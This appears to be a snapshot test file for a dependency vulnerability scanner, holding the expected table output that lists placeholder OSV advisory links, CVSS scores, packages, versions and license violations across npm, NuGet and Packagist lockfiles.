+-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | 4.3 | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ --- 
[TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | 9 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+-------------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+-------------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+-------------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/GHSA-123 | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | 8.3 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/GHSA-123 | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/GHSA-123 | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+-----------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+-----------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine3 | 0.10.2-rc | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+-----------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/second/lockfile | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfi ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬───────────────┬─────────┬─────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼───────────────┼─────────┼─────────────────── ≈ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/first/l ≈ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/ ≈ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/third/l ≈ ╰───────────────────┴───────────┴───────────────┴─────────┴─────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfi ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT, Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬─────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERS ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ Uncalled vulnerabilities │ │ │ │ │ ≈ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼─────────── ≈ │ https://osv.dev/OSV-1 │ 7.8 │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴─────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfil ≈ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬────────────── ≈ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION ≈ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼────────────── ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- ≈ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- ≈ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴────────────── ≈ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────── ≈ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE ≈ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────── ≈ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfil ≈ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfil ≈ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfil ≈ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────── ≈ --- [TestPrintTableResults_StandardTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
